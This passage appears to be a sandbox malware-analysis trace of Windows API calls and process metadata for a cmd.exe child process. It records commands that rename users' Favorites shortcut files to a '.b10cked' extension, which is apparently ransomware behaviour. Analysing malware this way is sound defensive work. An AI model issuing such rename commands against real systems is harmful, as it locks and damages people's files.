lpcbData=0x20e6b8*=0x1000) returned 0x2 [0213.732] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x20e6bc, lpData=0x20e6c0, lpcbData=0x20e6b8*=0x1000 | out: lpType=0x20e6bc*=0x4, lpData=0x20e6c0*=0x0, lpcbData=0x20e6b8*=0x4) returned 0x0 [0213.732] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x20e6bc, lpData=0x20e6c0, lpcbData=0x20e6b8*=0x1000 | out: lpType=0x20e6bc*=0x4, lpData=0x20e6c0*=0x9, lpcbData=0x20e6b8*=0x4) returned 0x0 [0213.732] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x20e6bc, lpData=0x20e6c0, lpcbData=0x20e6b8*=0x1000 | out: lpType=0x20e6bc*=0x4, lpData=0x20e6c0*=0x9, lpcbData=0x20e6b8*=0x4) returned 0x0 [0213.732] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x20e6bc, lpData=0x20e6c0, lpcbData=0x20e6b8*=0x1000 | out: lpType=0x20e6bc*=0x0, lpData=0x20e6c0*=0x9, lpcbData=0x20e6b8*=0x1000) returned 0x2 [0213.732] RegCloseKey (hKey=0x40) returned 0x0 [0213.732] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863af [0213.732] srand (_Seed=0x5b8863af) [0213.732] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\Default\\FAVORI~1\\MICROS~1\\MICROS~3.URL\" \"C:\\Users\\Default\\FAVORI~1\\MICROS~1\\Microsoft At Work.url.b10cked\"" [0213.732] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\Default\\FAVORI~1\\MICROS~1\\MICROS~3.URL\" \"C:\\Users\\Default\\FAVORI~1\\MICROS~1\\Microsoft At Work.url.b10cked\"" [0213.732] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0213.732] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3e1910, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0213.732] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0213.733] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0213.733] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0213.733] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0213.733] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0213.733] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0213.733] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0213.733] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0213.733] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0213.733] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0213.733] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0213.733] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0213.733] GetEnvironmentStringsW () returned 0x3e2300* [0213.733] FreeEnvironmentStringsW (penv=0x3e2300) returned 1 [0213.733] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0213.733] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0213.733] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0213.733] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0213.733] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0213.733] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0213.733] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0213.733] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0213.733] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0213.733] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0213.733] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x20f480 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0213.733] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x20f480, lpFilePart=0x20f47c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x20f47c*="Desktop") returned 0x18 [0213.733] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0213.733] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x20f1fc | out: lpFindFileData=0x20f1fc) returned 0x3e0040 [0213.734] FindClose (in: hFindFile=0x3e0040 | out: hFindFile=0x3e0040) returned 1 [0213.734] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x20f1fc | out: lpFindFileData=0x20f1fc) returned 0x3e0040 [0213.734] FindClose (in: hFindFile=0x3e0040 | out: hFindFile=0x3e0040) returned 1 [0213.734] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x20f1fc | out: lpFindFileData=0x20f1fc) returned 0x3e0040 [0213.734] FindClose (in: hFindFile=0x3e0040 | out: hFindFile=0x3e0040) returned 1 [0213.734] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0213.734] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0213.734] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0213.734] GetEnvironmentStringsW () returned 0x3e2b20* [0213.734] FreeEnvironmentStringsW (penv=0x3e2b20) returned 1 [0213.734] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0213.735] GetConsoleOutputCP () returned 0x1b5 [0213.735] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0213.735] GetUserDefaultLCID () returned 0x409 [0213.735] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0213.735] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x20f5c0, cchData=128 | out: lpLCData="0") returned 2 [0213.735] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x20f5c0, cchData=128 | out: lpLCData="0") returned 2 [0213.735] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x20f5c0, cchData=128 | out: lpLCData="1") returned 2 [0213.735] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0213.735] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0213.735] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0213.735] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0213.735] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0213.735] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0213.735] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0213.736] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0213.736] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0213.736] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0213.736] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0213.736] GetConsoleTitleW (in: lpConsoleTitle=0x3d0900, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0213.736] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0213.737] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0213.737] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0213.737] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0213.737] _wcsicmp (_String1="move", _String2=")") returned 68 [0213.737] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0213.737] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0213.737] _wcsicmp (_String1="IF", _String2="move") returned -4 [0213.737] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0213.737] _wcsicmp (_String1="REM", _String2="move") returned 5 [0213.737] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0213.740] GetConsoleTitleW (in: lpConsoleTitle=0x20f2b8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0213.740] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0213.740] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0213.740] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0213.740] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0213.740] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0213.740] _wcsicmp (_String1="move", _String2="CD") returned 10 [0213.740] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0213.740] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0213.740] _wcsicmp (_String1="move", _String2="REN") returned -5 [0213.740] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0213.740] _wcsicmp (_String1="move", _String2="SET") returned -6 [0213.741] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0213.741] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0213.741] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0213.741] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0213.741] _wcsicmp (_String1="move", _String2="MD") returned 11 [0213.741] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0213.741] _wcsicmp (_String1="move", _String2="RD") returned -5 [0213.741] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0213.741] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0213.741] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0213.741] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0213.741] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0213.741] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0213.741] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0213.741] _wcsicmp (_String1="move", _String2="VER") returned -9 [0213.741] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0213.741] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0213.741] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0213.741] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0213.741] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0213.741] _wcsicmp (_String1="move", _String2="START") returned -6 [0213.741] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0213.741] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0213.741] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0213.742] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0213.742] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0213.743] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x20f074, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x20f06c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x20f06c*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0213.743] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0213.743] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0213.743] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0213.743] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0213.743] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0213.743] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0213.743] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0213.743] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0213.743] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0213.743] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0213.743] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0213.743] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0213.748] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0213.748] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0213.748] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0213.748] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0213.748] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0213.748] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0213.748] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0213.748] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0213.748] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0213.748] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0213.748] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0213.748] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0213.748] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0213.748] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0213.748] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0213.748] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0213.748] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0213.748] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0213.748] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0213.748] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0213.748] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0213.748] _wcsicmp (_String1="MICROS~3.URL", _String2=".") returned 63 [0213.748] _wcsicmp (_String1="MICROS~3.URL", _String2="..") returned 63 [0213.749] GetFileAttributesW (lpFileName="C:\\Users\\Default\\FAVORI~1\\MICROS~1\\MICROS~3.URL" (normalized: "c:\\users\\default\\favori~1\\micros~1\\micros~3.url")) returned 0x20 [0214.035] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3e1e90 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0214.035] SetErrorMode (uMode=0x0) returned 0x0 [0214.035] SetErrorMode (uMode=0x1) returned 0x0 [0214.035] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\FAVORI~1\\MICROS~1\\MICROS~3.URL", nBufferLength=0x104, lpBuffer=0x20e9fc, lpFilePart=0x20e9e4 | out: lpBuffer="C:\\Users\\Default\\FAVORI~1\\MICROS~1\\MICROS~3.URL", lpFilePart=0x20e9e4*="MICROS~3.URL") returned 0x2f [0214.035] SetErrorMode (uMode=0x0) returned 0x1 [0214.035] GetFileAttributesW (lpFileName="C:\\Users\\Default\\FAVORI~1\\MICROS~1" (normalized: "c:\\users\\default\\favori~1\\micros~1")) returned 0x12 [0214.035] _wcsicmp (_String1="MICROS~3.URL", _String2=".") returned 63 [0214.035] _wcsicmp (_String1="MICROS~3.URL", _String2="..") returned 63 [0214.036] GetFileAttributesW (lpFileName="C:\\Users\\Default\\FAVORI~1\\MICROS~1\\MICROS~3.URL" (normalized: "c:\\users\\default\\favori~1\\micros~1\\micros~3.url")) returned 0x20 [0214.036] SetErrorMode (uMode=0x0) returned 0x0 [0214.036] SetErrorMode (uMode=0x1) returned 0x0 [0214.036] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\FAVORI~1\\MICROS~1\\MICROS~3.URL", nBufferLength=0x104, lpBuffer=0x20ee78, lpFilePart=0x20ec10 | out: lpBuffer="C:\\Users\\Default\\FAVORI~1\\MICROS~1\\MICROS~3.URL", lpFilePart=0x20ec10*="MICROS~3.URL") returned 0x2f [0214.036] SetErrorMode (uMode=0x0) returned 0x1 [0214.036] SetErrorMode (uMode=0x0) returned 0x0 [0214.036] SetErrorMode (uMode=0x1) returned 0x0 [0214.036] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\FAVORI~1\\MICROS~1\\Microsoft At Work.url.b10cked", nBufferLength=0x104, lpBuffer=0x20f080, lpFilePart=0x20ec10 | out: lpBuffer="C:\\Users\\Default\\FAVORI~1\\MICROS~1\\Microsoft At Work.url.b10cked", lpFilePart=0x20ec10*="Microsoft At Work.url.b10cked") returned 0x40 [0214.036] SetErrorMode (uMode=0x0) returned 0x1 [0214.036] SetLastError (dwErrCode=0x0) [0214.036] GetFileAttributesW (lpFileName="C:\\Users\\Default\\FAVORI~1\\MICROS~1\\Microsoft At Work.url.b10cked" (normalized: "c:\\users\\default\\favori~1\\micros~1\\microsoft at work.url.b10cked")) returned 0xffffffff [0214.036] GetLastError () returned 0x2 [0214.036] FindFirstFileExW (in: lpFileName="C:\\Users\\Default\\FAVORI~1\\MICROS~1\\MICROS~3.URL", fInfoLevelId=0x1, lpFindFileData=0x20e58c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x20e58c) returned 0x3d0ef0 [0214.036] FindNextFileW (in: hFindFile=0x3d0ef0, lpFindFileData=0x20e58c | out: lpFindFileData=0x20e58c) returned 0 [0214.037] GetLastError () returned 0x12 [0214.037] FindClose (in: hFindFile=0x3d0ef0 | out: hFindFile=0x3d0ef0) returned 1 [0214.038] FindFirstFileExW (in: lpFileName="C:\\Users\\Default\\FAVORI~1\\MICROS~1\\MICROS~3.URL", fInfoLevelId=0x1, lpFindFileData=0x3e1c30, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3e1c30) returned 0x3d0ef0 [0214.038] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\FAVORI~1\\MICROS~1\\Microsoft At Work.url.b10cked", nBufferLength=0x104, lpBuffer=0x20e824, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\FAVORI~1\\MICROS~1\\Microsoft At Work.url.b10cked", lpFilePart=0x0) returned 0x40 [0214.038] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\FAVORI~1\\MICROS~1\\Microsoft At Work.url", nBufferLength=0x104, lpBuffer=0x20e824, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\FAVORI~1\\MICROS~1\\Microsoft At Work.url", lpFilePart=0x0) returned 0x38 [0214.038] GetFileAttributesW (lpFileName="C:\\Users\\Default\\FAVORI~1\\MICROS~1\\Microsoft At Work.url" (normalized: "c:\\users\\default\\favori~1\\micros~1\\microsoft at work.url")) returned 0x20 [0214.038] MoveFileExW (lpExistingFileName="C:\\Users\\Default\\FAVORI~1\\MICROS~1\\Microsoft At Work.url" (normalized: "c:\\users\\default\\favori~1\\micros~1\\microsoft at work.url"), lpNewFileName="C:\\Users\\Default\\FAVORI~1\\MICROS~1\\Microsoft At Work.url.b10cked" (normalized: "c:\\users\\default\\favori~1\\micros~1\\microsoft at work.url.b10cked"), dwFlags=0x3) returned 1 [0214.039] FindClose (in: hFindFile=0x3d0ef0 | out: hFindFile=0x3d0ef0) returned 1 [0214.039] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x20e7d8 | out: _Buffer=" 1") returned 9 [0214.039] _get_osfhandle (_FileHandle=1) returned 0x7 [0214.039] GetFileType (hFile=0x7) returned 0x2 [0214.039] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0214.039] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x20e764 | out: lpMode=0x20e764) returned 1 [0214.039] _get_osfhandle (_FileHandle=1) returned 0x7 [0214.039] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x20e798 | out: lpConsoleScreenBufferInfo=0x20e798) returned 1 [0214.039] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0214.040] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x20e7d8 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0214.040] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x20e7bc, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x20e7bc*=0x1a) returned 1 [0214.040] _get_osfhandle (_FileHandle=1) returned 0x7 [0214.040] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0214.040] _get_osfhandle (_FileHandle=1) returned 0x7 [0214.040] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0214.040] _get_osfhandle (_FileHandle=0) returned 0x3 [0214.040] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0214.040] SetConsoleInputExeNameW () returned 0x1 [0214.040] GetConsoleOutputCP () returned 0x1b5 [0214.041] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0214.041] SetThreadUILanguage (LangId=0x0) returned 0x409 [0214.041] exit (_Code=0) Process: id = "527" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16720" os_pid = "0x134" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\Default\\FAVORI~1\\MICROS~1\\MICROS~1.URL\" \"C:\\Users\\Default\\FAVORI~1\\MICROS~1\\Microsoft Store.url.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 31419 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 31420 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 31421 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 31422 start_va = 0x1d0000 end_va = 0x2cffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 31423 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 31424 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 31425 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 31426 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 31427 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 31428 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 31604 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 31605 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 31606 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 31607 start_va = 0x4b0000 end_va = 0x5affff entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 31608 start_va = 0x790000 end_va = 0x79ffff entry_point = 0x0 region_type = private name = "private_0x0000000000790000" filename = "" Region: id = 31609 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 31610 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 31611 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 31612 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 31613 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 31614 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 31615 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: 